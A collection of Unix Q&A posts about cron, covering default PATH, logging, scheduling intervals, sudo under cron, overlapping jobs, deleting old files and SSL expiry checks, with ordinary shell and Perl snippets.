if [ -r "$HOME/.dbus/Xdbus" ]; then
. "$HOME/.dbus/Xdbus"
fi
Here is an answer that uses the same
mechanism.
| Using notify-send with cron |
1,341,916,713,000 |
Cron doesn't use the path of the user whose crontab it is and, instead, has its own. It can easily be changed by adding PATH=/foo/bar at the beginning of the crontab, and the classic workaround is to always use absolute paths to commands run by cron, but where is cron's default PATH defined?
I created a crontab with the following contents on my Arch system (cronie 1.5.1-1) and also tested on an Ubuntu 16.04.3 LTS box with the same results:
$ crontab -l
* * * * * echo "$PATH" > /home/terdon/fff
That printed:
$ cat fff
/usr/bin:/bin
But why? The default system-wide path is set in /etc/profile, but that includes other directories:
$ grep PATH= /etc/profile
PATH="/usr/local/sbin:/usr/local/bin:/usr/bin"
There is nothing else relevant in /etc/environment or /etc/profile.d, the other files I thought might possibly be read by cron:
$ grep PATH= /etc/profile.d/* /etc/environment
/etc/profile.d/jre.sh:export PATH=${PATH}:/usr/lib/jvm/default/bin
/etc/profile.d/mozilla-common.sh:export MOZ_PLUGIN_PATH="/usr/lib/mozilla/plugins"
/etc/profile.d/perlbin.sh:[ -d /usr/bin/site_perl ] && PATH=$PATH:/usr/bin/site_perl
/etc/profile.d/perlbin.sh:[ -d /usr/lib/perl5/site_perl/bin ] && PATH=$PATH:/usr/lib/perl5/site_perl/bin
/etc/profile.d/perlbin.sh:[ -d /usr/bin/vendor_perl ] && PATH=$PATH:/usr/bin/vendor_perl
/etc/profile.d/perlbin.sh:[ -d /usr/lib/perl5/vendor_perl/bin ] && PATH=$PATH:/usr/lib/perl5/vendor_perl/bin
/etc/profile.d/perlbin.sh:[ -d /usr/bin/core_perl ] && PATH=$PATH:/usr/bin/core_perl
There is also nothing relevant in any of the files in /etc/skel, unsurprisingly, nor is it being set in any /etc/cron* file:
$ grep PATH /etc/cron* /etc/cron*/*
grep: /etc/cron.d: Is a directory
grep: /etc/cron.daily: Is a directory
grep: /etc/cron.hourly: Is a directory
grep: /etc/cron.monthly: Is a directory
grep: /etc/cron.weekly: Is a directory
/etc/cron.d/0hourly:PATH=/sbin:/bin:/usr/sbin:/usr/bin
So, where is cron's default PATH for user crontabs being set? Is it hardcoded in cron itself? Doesn't it read some sort of configuration file for this?
|
It’s hard-coded in the source code (that link points to the current Debian cron — given the variety of cron implementations, it’s hard to choose one, but other implementations are likely similar):
#ifndef _PATH_DEFPATH
# define _PATH_DEFPATH "/usr/bin:/bin"
#endif
cron doesn’t read default paths from a configuration file; I imagine the reasoning there is that it supports specifying paths already using PATH= in any cronjob, so there’s no need to be able to specify a default elsewhere. (The hard-coded default is used if nothing else specified a path in a job entry.)
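You can reproduce that stripped-down environment yourself with env -, which clears everything and sets only what you name; a small sketch:

```shell
# Start from an empty environment, setting only cron's hard-coded default
# PATH, and show what a cron job would see.
env - PATH=/usr/bin:/bin sh -c 'echo "$PATH"'
```

This prints /usr/bin:/bin, matching the crontab experiment in the question.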
| Where is cron's PATH set? |
1,341,916,713,000 |
On a new Ubuntu 10.4 instance, I tried to use the locate command only to receive the error
locate: can not stat () `/var/lib/mlocate/mlocate.db': No such file or directory
from using this command on other systems I'm guessing that this means the database has not yet been built (it is a fresh install). I believe it is supposed to run daily, but how would I queue it up to run immediately?
Also, how is "run daily" determined? If I have a box that I only turn on for an hour at a time, will the database ever be built on its own?
|
The cron job is defined in /etc/cron.daily/mlocate.
To run it immediately:
sudo updatedb
or better
sudo ionice -c3 updatedb
This is better because updatedb is put in the idle I/O scheduling class, so that it does not disturb (from the I/O point of view) other applications. From the ionice man page:
-c class
The scheduling class. 0 for none, 1 for real time, 2 for
best-effort, 3 for idle.
........................
Idle A program running with idle io priority will only get disk time
when no other program has asked for disk io for a defined
grace period. The impact of idle io processes on normal system
activity should be zero. This scheduling class does not take a
priority argument. Presently, this scheduling class is permitted
for an ordinary user (since kernel 2.6.25).
| How do I enable locate and queue the database to be built? |
1,341,916,713,000 |
On Redhat systems cron logs into /var/log/cron file. What is the equivalent of that file on Debian systems?
|
Under Ubuntu, cron writes logs via rsyslogd to /var/log/syslog. You can redirect messages from cron to another file by uncommenting one line in /etc/rsyslog.d/50-default.conf. I believe, the same applies to Debian.
| Cron log on debian systems |
1,341,916,713,000 |
I am running my Python script in the background in my Ubuntu machine (12.04) like this -
nohup python testing.py > test.out &
Now, it might be possible that at some stage my above Python script can die for whatever reason.
So I am thinking to have some sort of cron agent in bash shell script which can restart my above Python script automatically if it is killed for whatever reason.
Is this possible to do? If yes, then what's the best way to solve these kind of problem?
UPDATE:
After creating the testing.conf file like this -
chdir /tekooz
exec python testing.py
respawn
I ran the sudo command below to start it, but I cannot see the process running with ps ax:
root@bx13:/bezook# sudo start testing
testing start/running, process 27794
root@bx13:/bezook# ps ax | grep testing.py
27806 pts/3 S+ 0:00 grep --color=auto testing.py
Any idea why ps ax is not showing me anything? And how do I check whether my program is running or not?
This is my python script -
#!/usr/bin/python
import time

while True:
    print "Hello World"
    time.sleep(5)
|
On Ubuntu (until 14.04; 16.04 and later use systemd) you can use upstart for this, which is better than a cron job. You put a config setup in /etc/init and make sure you specify respawn
It could be a minimal file /etc/init/testing.conf (edit as root):
chdir /your/base/directory
exec python testing.py
respawn
And you can test with /your/base/directory/testing.py:
from __future__ import print_function
import time
with open('/var/tmp/testing.log', 'a') as fp:
print(time.time(), 'done', file=fp)
time.sleep(3)
and start with:
sudo start testing
and follow what happens (in another window) with:
tail -f /var/tmp/testing.log
and stop with:
sudo stop testing
You can also add a start on stanza to have the command start when the system boots.
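For completeness, a hypothetical start on / stop on pair for /etc/init/testing.conf might look like this (the runlevels are an assumption and may need adjusting for your setup):

```
# start the job once normal runlevels are reached, stop it on halt/reboot
start on runlevel [2345]
stop on runlevel [016]
```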
| How to restart the Python script automatically if it is killed or dies |
1,341,916,713,000 |
Question
I'd like to be able to run a UNIX command precisely every second over a long time period.
I need a solution, which does not lag behind after a certain time, because of the time the command itself needs for execution. sleep, watch, and a certain python script all failed me in this regard.
On microcontrollers such as the Arduino I'd do that through hardware clock interrupts.
I'd like to know whether there is a similar time-precise shell script solution. All the solutions which I found within StackExchange.com, resulted in a noticeable time lag, if run over hours. See details below.
Practical purpose / application
I want to test whether my network connection is continuously up by sending timestamps via nc (netcat) every 1 second.
Sender:
precise-timestamp-generator | tee netcat-sender.txt | nc $receiver $port
Receiver:
nc -l -p $port > netcat-receiver.txt
After completion, compare the two logs:
diff netcat-sender.txt netcat-receiver.txt
The diffs would be the untransmitted timestamps.
From this I would know at what time my LAN / WAN / ISP makes troubles.
Solution SLEEP
while [ true ]; do date "+%Y-%m-%d %H:%M:%S" ; sleep 1; done | tee timelog-sleep.txt
Gets a certain offset over time, as the command within the loop also takes a little time.
Precision
cat timelog-sleep.txt
2012-07-16 00:45:16
[...]
2012-07-16 10:20:36
Seconds elapsed: 34520
wc -l timelog-sleep.txt
Lines in file: 34243
Precision summarized:
34520-34243 = 277 timing problems
34520/34243 = 1.008 = 0.8 % off
Solution REPEAT PYTHON
Found at: Repeat a Unix command every x seconds forever
repeat.py 1 "date '+%Y-%m-%d %H:%M:%S'" >> timelog-repeat-py.txt
Supposed to avoid the time offset, but fails to do so.
Precision
wc -l timelog-repeat-py.txt
2012-07-16 13:42:44
[...]
2012-07-16 16:45:24
Seconds elapsed: 10960
wc -l timelog-repeat-py.txt
Lines in file: 10859
Precision summarized:
10960-10859 = 101 timing problems
10960/10859 = 1.009 = 0.9 % off
Solution WATCH
watch -n 1 "date '+%Y-%m-%d %H:%M:%S' >> ~/Desktop/timelog-watch.txt"
Precision
wc -l timelog-watch.txt
2012-07-16 11:04:08
[...]
2012-07-16 13:25:47
Seconds elapsed: 8499
wc -l timelog-watch.txt
Lines in file: 8366
Precision summarized:
8499-8366 = 133 timing problems.
8499/8366 = 1.016 = 1.6 % off.
|
How about this Perl script I just whipped up?
#!/usr/bin/perl
use strict;
use warnings;
use Time::HiRes qw/time sleep/;
sub launch {
return if fork;
exec @_;
die "Couldn't exec";
}
$SIG{CHLD} = 'IGNORE';
my $interval = shift;
my $start = time();
while (1) {
launch(@ARGV);
$start += $interval;
sleep $start - time();
}
Use: perl timer.pl 1 date '+%Y-%m-%d %H:%M:%S'
It has been running 45 minutes without a single skip, and I suspect it will continue to do so unless a) system load becomes so high that fork() takes more than a second or b) a leap second is inserted.
It cannot guarantee, however, that the command runs at exact second intervals, as there is some overhead, but I doubt it is much worse than an interrupt-based solution.
I ran it for about an hour with date +%N (nanoseconds, GNU extension) and ran some statistics on it. The most lag it had was 1155 microseconds. Average (arithmetic mean) 216 µs, median 219 µs, standard deviation 42 µs. It ran faster than 270 µs 95% of the time. I don't think you can beat it except with a C program.
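The same absolute-deadline trick works in plain sh too; here is a minimal sketch (assumes date +%s, a GNU/BSD extension; the one-second interval and three-iteration cap are toy values, and echo stands in for the real command):

```shell
#!/bin/sh
# Sleep until an absolute deadline rather than for a fixed interval,
# so per-iteration overhead does not accumulate into drift.
interval=1
start=$(date +%s)
i=0
while [ "$i" -lt 3 ]; do
    echo "tick $i"                              # stand-in for the real command
    i=$((i + 1))
    now=$(date +%s)
    wait_for=$((start + i * interval - now))
    [ "$wait_for" -gt 0 ] && sleep "$wait_for"
done
echo done
```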
| Run unix command precisely at very short intervals WITHOUT accumulating time lag over time |
1,341,916,713,000 |
Is there any variable that cron sets when it runs a program ? If the script is run by cron, I would like to skip some parts; otherwise invoke those parts.
How can I know if the Bash script is started by cron ?
|
I'm not aware that cron does anything to its environment by default that can be of use here, but there are a couple of things you could do to get the desired effect.
1) Make a hard or soft link to the script file, so that, for example, myscript and myscript_via_cron point to the same file. You can then test the value of $0 inside the script when you want to conditionally run or omit certain parts of the code. Put the appropriate name in your crontab, and you're set.
2) Add an option to the script, and set that option in the crontab invocation. For example, add an option -c, which tells the script to run or omit the appropriate parts of the code, and add -c to the command name in your crontab.
And of course, cron can set arbitrary environment variables, so you could just put a line like RUN_BY_CRON="TRUE" in your crontab, and check its value in your script.
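A minimal sketch of that last approach: the crontab sets the variable on its own line, and the script branches on it (RUN_BY_CRON is just the name suggested above):

```shell
#!/bin/sh
# In the crontab:
#   RUN_BY_CRON="TRUE"
#   0 * * * * /path/to/this/script
# When run interactively the variable is unset, so the else branch runs.
if [ "${RUN_BY_CRON:-}" = "TRUE" ]; then
    echo "started by cron: skipping interactive parts"
else
    echo "started manually: running everything"
fi
```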
| Check if script is started by cron, rather than invoked manually |
1,341,916,713,000 |
I'm curious to know: why are crontabs stored in /var rather than in the user's home directories? It makes it a total pain to isolate these files for upgrades but I suspect that there is a logical reason...
|
Few reasons I can think of:
In corporate environments, you can have thousands of users. If so, cron would have to scan through every single user's directory every single minute to check for the crontab file (whether it has been created, deleted, or modified).
By keeping them in a single location, it doesn't have to do this intensive scan.
Home directories might not be always available. If the home directories are an autofs mount, they might not be mounted. Having cron check them every single minute would cause them to be mounted, and prevent them from unmounting due to inactivity. Also if the home directory is encrypted, and decrypted with the user's password, cron won't be able to get to the home directory unless the user has logged in and decrypted/mounted it.
Home directories might be shared across hosts. If the home directory is a network share, that same home directory will appear on multiple hosts. But you might not want your cron jobs to run on every single host, just one of them.
| Why aren't crontabs stored in user home directories? |
1,341,916,713,000 |
When I schedule a job, some seem to be applied immediately, while others after a reboot. So is it recommended to restart cron (crond) after adding a new cron job? How to do that properly (esp. in a Debian system), and should that be done with sudo (like sudo service cron restart) even for that of normal users'?
I tried:
/etc/init.d/cron restart
which doesn't seem to work (neither does /etc/init.d/cron stop or service cron stop) and completes with return code 1.
Here's a part of the message output:
Since the script you are attempting to invoke has been converted to an
Upstart job, you may also use the stop(8) utility, e.g. stop cron
stop: Rejected send message, 1 matched rules; type="method_call", sender=":1.91" (uid=1000 pid=3647 comm="stop cron ") interface="com.ubuntu.Upstart0_6.Job" member="Stop" error name="(unset)" requested_reply="0" destination="com.ubuntu.Upstart" (uid=0 pid=1 comm="/sbin/init")
(what does that mean?)
|
No you don't have to restart cron, it will notice the changes to your crontab files (either /etc/crontab or a users crontab file).
At the top of your /etc/crontab you probably have (if you have the Vixie implementation of cron, which IIRC is the one on Debian):
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
The reason you might not see specific changes implemented is if you add things to e.g. /etc/cron.daily and the daily run has already occurred.
The message that you get is because you use an old way of restarting cron on your system. The recommended way (but not necessary if you just edit cron files) is:
restart cron
You of course have to reboot in order to see the effects of a @reboot cron job
| Is a restart of cron or crond necessary after each new schedule addition or modification? |
1,341,916,713,000 |
The Case:
I need to run some commands/script at certain intervals of time and for this I have two options:
set up a cron-job
implement a loop with sleep in the script itself.
Question:
Which is the better option from resource consumption point of view, why? Is cron the better way? Does cron use some kind of triggers or something making it efficient over the other? What procedure does cron use to check and start the jobs?
|
Use cron because it is a better and more standard practice. At least if this is something that will regularly run (not just something you patched together in a minute). cron is a cleaner and more standard way. It's also better because it runs the shell detached from a terminal - no problem with accidental termination and dependencies on other processes.
Regarding the resources:
CPU: Both processes sleep - when they sleep, they do not waste CPU. cron wakes up more frequently to check on things, but it does that anyway (no more for your process). And this is negligible load, most daemons wake up occasionally.
Memory: You probably have cron running regardless of this process, so this is no overhead at all. However, cron will only start the shell when the script is called, whereas your script remains loaded in memory (a bash process with environment - a few kilobytes, unless you are loading everything in shell variables).
All in all, for resources it doesn't matter.
| cron Vs. sleep - which is the better one in terms of efficient cpu/memory utilization? |
1,341,916,713,000 |
I have a script run from a non-privileged users' crontab that invokes some commands using sudo. Except it doesn't. The script runs fine but the sudo'ed commands silently fail.
The script runs perfectly from a shell as the user in question.
Sudo does not require a password. The user in question has (root) NOPASSWD: ALL access granted in /etc/sudoers.
Cron is running and executing the script. Adding a simple date > /tmp/log produces output at the right time.
It's not a permissions problem. Again the script does get executed, just not the sudo'ed commands.
It's not a path problem. Running env from inside the script being run shows the correct $PATH variable that includes the path to sudo. Running it using a full path doesn't help. The command being executed is being given the full path name.
Trying to capture the output of the sudo command including STDERR doesn't show anything useful. Adding sudo echo test 2>&1 > /tmp/log to the script produces a blank log.
The sudo binary itself executes fine and recognizes that it has permissions even when run from cron inside the script. Adding sudo -l > /tmp/log to the script produces the output:
User ec2-user may run the following commands on this host:
(root) NOPASSWD: ALL
Examining the exit code of the command using $? shows it is returning an error (exit code: 1), but no error seems to be produced. A command as simple as /usr/bin/sudo /bin/echo test returns the same error code.
What else could be going on?
This is a recently created virtual machine running the latest Amazon Linux AMI. The crontab belongs to the user ec2-user and the sudoers file is the distribution default.
|
sudo has some special options in its permissions file, one of which restricts its usage to shells that are running inside a TTY, which cron jobs are not.
Some distros including the Amazon Linux AMI have this enabled by default. The /etc/sudoers file will look something like this:
# Disable "ssh hostname sudo <cmd>", because it will show the password in clear.
# You have to run "ssh -t hostname sudo <cmd>".
#
Defaults requiretty
#
# Refuse to run if unable to disable echo on the tty. This setting should also be
# changed in order to be able to use sudo without a tty. See requiretty above.
#
Defaults !visiblepw
If you had captured output to STDERR at the level of the shell script rather than the sudo command itself, you would have seen a message something like this:
sorry, you must have a tty to run sudo
The solution is to allow sudo to execute in non TTY environments either by removing or commenting out these options:
#Defaults requiretty
#Defaults !visiblepw
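If you'd rather not relax the check globally, sudoers also supports per-user Defaults; a hedged sketch scoped to the ec2-user account from the question (edit with visudo):

```
# Allow sudo without a TTY for this one account only
Defaults:ec2-user !requiretty
```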
| Why does cron silently fail to run sudo stuff in my script? |
1,341,916,713,000 |
I've had a cronjob working for about a fortnight without any problems.
Then last night I checked I didn't get the email that I usually get.
I went to the terminal to try send myself an email, I got the following error:
mail: cannot send message: process exited with a non-zero status
I haven't changed anything with my ssmtp cfg file. It just stopped working, when I check and recheck everything, the code, ssmtp, everything is perfect.
I send out my emails twice a day via cronjob. The crontab hasn't been interfered either. I really don't know why it would stop working.
The system sends out emails via gmail - I've gone into the gmail account and sent out test emails, they are sent and received without any problems.
Additionally I've checked throughout google, forums, websites I don't see any mistakes. This makes sense as everything was working fine 24 hours ago, and now it's just stopped.
Q: Is there any way of diagnosing and troubleshooting how to solve such a problem?
|
I had the same problem on an Ubuntu 14.04 server. I found an error message in /var/log/mail.err, which said:
postfix/sendmail[27115]: fatal: open /etc/postfix/main.cf: No such file or directory
Then I just reconfigured postfix and solved this problem.
sudo dpkg-reconfigure postfix
| mail: cannot send message: process exited with a non-zero status |
1,341,916,713,000 |
It's not clear to me from the manpage for crontab: is extra whitespace allowed between the fields? E.g., if I have this:
1 7 * * * /scripts/foo
5 17 * * 6 /script/bar
31 6 * * 0 /scripts/bofh
is it safe to reformat it nicely like this:
1 7 * * * /scripts/foo
5 17 * * 6 /script/bar
31 6 * * 0 /scripts/bofh
?
|
Yes extra space is allowed and you can nicely line up your fields for readability. From man 5 crontab
Blank lines and leading spaces and tabs are ignored.
and
An environment setting is of the form,
name = value
where the spaces around the equal-sign (=) are optional, and any
subsequent non-leading spaces in value will be part of the value
assigned to name.
For the fields itself the man pages says:
The fields may be separated by spaces or tabs.
That should be clear: multiple spaces are allowed.
| Do spaces matter in a crontab |
1,341,916,713,000 |
I used crontab -e to add the following line to my crontab:
* * * * * echo hi >> /home/myusername/test
Yet, I don't see that the test file is written to. Is this a permission problem, or is crontab not working correctly?
I see that the cron process is running. How can I debug this?
Edit - Ask Ubuntu has a nice question about crontab, unfortunately that still doesn't help me.
Edit 2 - Hmm, it seems my test file has 214 lines, which means for the last 214 minutes it has been written to every minute. I'm not sure what was the problem, but it's evidently gone.
|
There are implementations of cron (not all of them, and I don't remember which offhand, but I've encountered one under Linux) that check for updated crontab files every minute on the minute, and do not consider new entries until the next minute. Therefore, a crontab can take up to two minutes to fire up for the first time. This may be what you observed.
| Why did my crontab not trigger? |
1,341,916,713,000 |
I want two jobs to run sometime every day, serially, in exactly the order I specify. Will this crontab reliably do what I want?
@daily job1
@daily job2
I'm assuming they run one after the other, but I was unable to find the answer by searching the Web or from any of these manpages: cron(1), crontab(1), crontab(5).
The crontab above obviously won't do what I want if cron runs things scheduled with @daily in parallel or in an unpredictable order.
I know I can simply make one shell script to fire them off in order, I'm just curious how cron is supposed to work (and I'm too lazy to gather test data or read the source code).
Cron is provided by the cron package. OS is Ubuntu 10.04 LTS (server).
|
After a quick glance at the source (in Debian squeeze, which I think is the same version), it does look like entries within a given file and with the same times are executed in order. For this purpose, @daily and 0 0 * * * are identical (in fact @daily is identical to 0 0 * * * in this cron).
I would not rely on this across the board. It's possible that one day someone will decide that cron should run jobs in parallel, to take advantage of these 32-core CPUs that have 31 cores running idle. This might be done when implementing this 20-year old todo item encountered in the cron source:
All of these should be flagged and load-limited; i.e.,
instead of @hourly meaning "0 * * * *" it should mean
"close to the front of every hour but not 'til the
system load is low". (…) (vix, jan90)
It's very easy to write @daily job1; job2 here. If it's important that the jobs execute in order, make it a direct consequence of what you write.
Additionally, making the order explicit removes the risk that a future administrator will reorder the lines thinking that it won't matter.
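In a crontab that explicit form might look like this (paths are hypothetical; the && variant additionally skips job2 if job1 fails):

```
# run both in order, unconditionally:
@daily /usr/local/bin/job1; /usr/local/bin/job2
# or: run job2 only if job1 succeeded
@daily /usr/local/bin/job1 && /usr/local/bin/job2
```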
| Are multiple @daily crontab entries processed in order, serially? |
1,341,916,713,000 |
Is this valid crontab time specification, doing what is expected:
0 22-4 * * *
Or is it necessary to do something like
0 22,23,0,1,2,3,4 * * *
|
I've never attempted to use a range like that, and I'm not sure whether it would work. So my first advice would be to test it and see what happens - though probably with a script that only does a log entry or something else innocuous.
Second, for AT&T and BSD cron you can't have ranges and lists co-existing, so there you'd either have to list each hour separately or have two lines, one with the range and one with the list.
| Crontab entry with hour range going over midnight |
1,327,513,801,000 |
I need to remove files older than 3 days with a cron job in 3 different directories. (these 3 directories are children of a parent directory /a/b/c/1 & /a/b/c/2 & /a/b/c/3) Can this be done with one line in the crontab?
|
This is easy enough (although note that this goes by a modification time more than 3 days ago since a creation time is only available on certain filesystems with special tools):
find /a/b/c/1 /a/b/c/2 -type f -mtime +3 #-delete
Remove the # before the -delete once you are sure that it is finding the files you want to remove.
To have it run by cron, I would probably just create an executable script (add a shebang, #!/bin/sh, as the top line of the file and make it executable with chmod a+x), then put it in an appropriate cron directory like /etc/cron.daily or /etc/cron.weekly. Provided of course that you do not need a more specific schedule and that these directories exist on your distro.
Update
As noted below, the -delete option for find isn't very portable. A POSIX compatible approach would be:
find /a/b/c/1 /a/b/c/2 -type f -mtime +3 #-exec rm {} +
Again remove the # when you are sure you have the right files.
Update2
To quote from Stéphane Chazelas comment below:
Note that -exec rm {} + has race condition vulnerabilities which -delete (where available) doesn't have. So don't use it on directories that are writeable by others. Some finds also have a -execdir that mitigates against those vulnerabilities.
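Before pointing this at real data, you can rehearse the -mtime test on a scratch directory (backdating with touch -d is a GNU extension):

```shell
#!/bin/sh
# One file backdated beyond the 3-day threshold, one fresh file:
# only the old one matches -mtime +3 and gets removed.
d=$(mktemp -d)
touch -d '4 days ago' "$d/old"
touch "$d/new"
find "$d" -type f -mtime +3 -exec rm {} +
ls "$d"        # only "new" remains
rm -rf "$d"
```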
| Cron job to delete files older than 3 days |
1,327,513,801,000 |
I have a cron job that is running a script. When I run the script via an interactive shell (ssh'ed to bash) it works fine. When the script runs by itself via cron it fails.
My guess is that it is using some of the environmental variables set in the interactive shell. I'm going to troubleshoot the script and remove these.
After I make changes, I know I could queue up the script in cron to have it run as it would normally, but is there a way I can run the script from the command line, but tell it to run as it would from cron - i.e. in a non-interactive environment?
|
The main differences between running a command from cron and running on the command line are:
cron is probably using a different shell (generally /bin/sh);
cron is definitely running in a small environment (which ones depends on the cron implementation, so check the cron(8) or crontab(5) man page; generally there's just HOME, perhaps SHELL, perhaps LOGNAME, perhaps USER, and a small PATH);
cron treats the % character specially (it is turned into a newline);
cron jobs run without a terminal or graphical environment.
The following invocation will run the shell snippet pretty much as if it was invoked from cron. I assume the snippet doesn't contain the characters ' or %.
env - HOME="$HOME" USER="$USER" PATH=/usr/bin:/bin /bin/sh -c 'shell snippet' </dev/null >job.log 2>&1
See also executing a sh script from the cron, which might help solve your problem.
| Run script in a non interactive shell? |
1,327,513,801,000 |
I need to run a script every 64 hours. I couldn't find the answer with cron. Is it possible with it, or should I use a loop in a shell script?
|
I suggest perhaps using a crontab "front end" like crontab.guru for figuring out crontab if you're a beginner.
However, as in your case, the hour setting only allows for values of 0 to 23, so you can't use crontab here.
Instead, I'd suggest using at. In your case, I'd probably use something like:
at now + 64 hours
and then enter your command or
echo "<your command>" | at now + 64 hours
at the beginning of your script, etc.
Basically, you'll be scheduling running the command right when the command has been invoked the last time. Also, if you don't want a time delta, rather the exact time, I suggest doing a bit of time arithmetic, and then use an exact time with at to have the command run.
I highly suggest reading the man page of at, as it is fairly comprehensive.
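For the exact-time variant, GNU date can do the arithmetic; a sketch (date -d is a GNU extension, and the at invocation is shown only as a comment since it would queue a real job):

```shell
#!/bin/sh
# Absolute timestamp 64 hours from now, in the [[CC]YY]MMDDhhmm
# format accepted by "at -t".
next=$(date -d '+64 hours' +%Y%m%d%H%M)
echo "$next"
# One could then queue the next run with:
#   echo "/path/to/script" | at -t "$next"
```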
| How to run a script every 64 hours? |
1,327,513,801,000 |
How do I temporarily disable one or more users' cron jobs? In particular, I do not want to suspend the user's cron rights - merely not fire any of their jobs.
I am on SLES 11 SP2 and SP3 systems
|
(Note that this answer was written in the days before systemd. I haven't checked how systemd's version of cron behaves in this scenario.)
touch /var/spool/cron/crontabs/$username; chmod 0 /var/spool/cron/crontabs/$username should do the trick. Restore with chmod 600 and touch (you need to change the file's mtime to make cron (attempt to) reload it).
On at least Debian and probably with Vixie cron in general, chmod 400 /var/spool/cron/crontabs/$username also does the trick, because that implementation insists on permissions being exactly 600. However this only lasts until the user runs the crontab command.
If you want a robust way, I don't think there's anything better than temporarily moving their crontab out of the way or changing the permissions, and temporarily adding them to /etc/cron.deny.
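Here is the permission toggle rehearsed on a scratch file instead of a real spool file (on SLES the crontab lives under /var/spool/cron/tabs/$username; the touch updates the mtime so cron notices the change):

```shell
#!/bin/sh
# A throwaway file stands in for the user's crontab file.
f=$(mktemp)
chmod 0 "$f" && touch "$f"      # "disable": cron can no longer read it
ls -l "$f" | cut -c1-10         # ----------
chmod 600 "$f" && touch "$f"    # "re-enable"
ls -l "$f" | cut -c1-10         # -rw-------
rm -f "$f"
```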
| how to temporarily disable a user's cronjobs? |
1,327,513,801,000 |
Could you advise me what to write in crontab so that it runs some job (for testing I will use /usr/bin/chromium-browser) every 15 seconds?
|
You can't go below one minute granularity with cron. What you can do is, every minute, run a script that runs your job, waits 15 seconds and repeats. The following crontab line will start some_job every 15 seconds.
* * * * * for i in 0 1 2; do some_job & sleep 15; done; some_job
This script assumes that the job will never take more than 15 seconds. The following slightly more complex script takes care of not running the next instance if one took too long to run. It relies on date supporting the %s format (e.g. GNU or Busybox, so you'll be ok on Linux). If you put it directly in a crontab, note that % characters must be written as \% in a crontab line.
end=$(($(date +%s) + 45))
while true; do
some_job &
[ $(date +%s) -ge $end ] && break
sleep 15
wait
done
[ $(date +%s) -ge $(($end + 15)) ] || some_job
I will however note that if you need to run a job as often as every 15 seconds, cron is probably the wrong approach. Although unices are good with short-lived processes, the overhead of launching a program every 15 seconds might be non-negligible (depending on how demanding the program is). Can't you run your application all the time and have it execute its task every 15 seconds?
| Cron running job every 15 seconds |
1,327,513,801,000 |
I add some job in crontab file on a server.
When I log out and the server is still on, will the job still run?
Does it matter if I create a screen or tmux session and run some shell in it and detach it before log out?
|
cron is a process which deals with scheduled tasks whether you are logged in or not. It is not necessary to have a screen or tmux session running since the cron daemon will execute the scheduled tasks in separate shells.
See man cron and man crontab for details.
| Does a job scheduled in crontab run even when I log out? |
1,327,513,801,000 |
I've edited my root cron tab to periodically execute a script located in a particular user's folder using this command:
sudo crontab -e
When cron runs the script, this is the output:
sh: 1: /home/user/Location/Of/Script: Permission denied
I thought that the root cron had permission to do anything. I have no issue when I manually run this script as root.
I've read in the documentation that further error info can be found here:
sudo cat /var/log/syslog
Here's what I found:
Jan 30 12:30:01 backup CRON[17702]: (CRON) info (No MTA installed, discarding output)
However, I think this is probably unrelated to the permission denied issue.
So what do I really need to do?
|
I think that your script is not executable. Use the following command to make it executable:
chmod +x /home/user/Location/Of/Script
Or, if you are not the owner of that script:
sudo chmod +x /home/user/Location/Of/Script
| Root Cron Won't Run Script (permission denied) |
1,327,513,801,000 |
I have the following general question regarding cron jobs.
Suppose I have the following in my crontab:
* 10 * * * someScript.sh
* 11 * * * someScript2.sh
30 11 */2 * * someScript3.sh <-- Takes a long time let's say 36 hours.
* 12 * * * someScript4.sh
Is it smart enough to run the remaining jobs at the appropriate times? For example, the long script doesn't need to terminate?
Also, what happens if the initial long script is still running and it gets called by cron again?
|
Each cron job is executed independent of any other jobs you may have specified. This means that your long-lived script will not impede other jobs from being executed at the specified time.
If any of your scripts are still executing at their next scheduled cron interval, then another, concurrent, instance of your script will be executed.
This can have unforeseen consequences depending on what your script does. I would recommend reading the Wikipedia article on File Locking, specifically the section on Lock files. A lock file is a simple mechanism to signal that a resource — in your case the someScript3.sh script — is currently 'locked' (i.e. in use) and should not be executed again until the lock file is removed.
Take a look at the answers to the following question for details of ways to implement a lock file in your script:
How to make sure only one instance of a bash script runs?
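As an illustration of the lock-file idea, here is a minimal sketch using `flock(1)` from util-linux (the lock path and messages are my own inventions). Prepended to someScript3.sh, it makes an overlapping cron invocation exit instead of stacking up behind the running one:

```sh
#!/bin/sh
# Lock-file sketch: refuse to run if a previous instance still holds the lock.
# The lock path can be overridden via LOCKFILE for testing.
lock=${LOCKFILE:-/tmp/someScript3.lock}
exec 9>"$lock"                 # open (and create) the lock file on fd 9
if ! flock -n 9; then          # -n: fail immediately instead of waiting
    echo "previous instance still running, skipping" >&2
    exit 0
fi
echo "lock acquired, running job"
# ... the long-running work goes here; the lock is released on exit ...
```

Because the lock is tied to the open file descriptor, it is released automatically even if the script crashes, which avoids the stale-lock problem of hand-rolled lock files.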
| Run multiple cron jobs where one job takes a long time |
1,327,513,801,000 |
I have several SSL certificates, and I would like to be notified, when a certificate has expired.
My idea is to create a cronjob, which executes a simple command every day.
I know that the openssl command in Linux can be used to display the certificate info of remote server, i.e.:
openssl s_client -connect www.google.com:443
But I don't see the expiration date in this output. Also, I have to terminate this command with CTRL+c.
How can I check the expiration of a remote certificate from a script (preferably using openssl) and do it in "batch mode" so that it runs automatically without user interaction?
|
Your command now sits waiting for an HTTP request (such as GET /index.php), which is why you have to terminate it by hand. Use this instead:
if true | openssl s_client -connect www.google.com:443 2>/dev/null | \
openssl x509 -noout -checkend 0; then
echo "Certificate is not expired"
else
echo "Certificate is expired"
fi
true: will just give no input followed by eof, so that openssl exits after connecting.
openssl ...: the command from your question
2>/dev/null: error output will be ignored.
openssl x509: activates X.509 Certificate Data Management.
By default this reads from standard input
-noout: Suppresses the whole certificate output
-checkend 0: check if the certificate is expired in the next 0 seconds
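For a daily cron job you usually want advance warning rather than "expired right now". Since -checkend takes seconds, a variation for a local PEM file might look like this (the function name and messages are made up; for a remote host, feed the s_client output through openssl x509 exactly as shown above):

```sh
# Sketch: warn if a certificate file expires within N days (default 30).
check_cert_expiry() {   # usage: check_cert_expiry CERT.pem [DAYS]
    cert=$1 days=${2:-30}
    # -checkend N succeeds if the cert is still valid N seconds from now
    if openssl x509 -in "$cert" -noout -checkend $(( days * 86400 )); then
        echo "OK: $cert valid for more than $days days"
    else
        echo "WARNING: $cert expires within $days days"
    fi
}
```

In a cron job you would print nothing in the OK branch, so that cron only mails you the WARNING case.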
| script to check if SSL certificate is valid |
1,327,513,801,000 |
My colleague ran grep | crontab. After that all jobs disappeared. Looks like he was trying to run crontab -l.
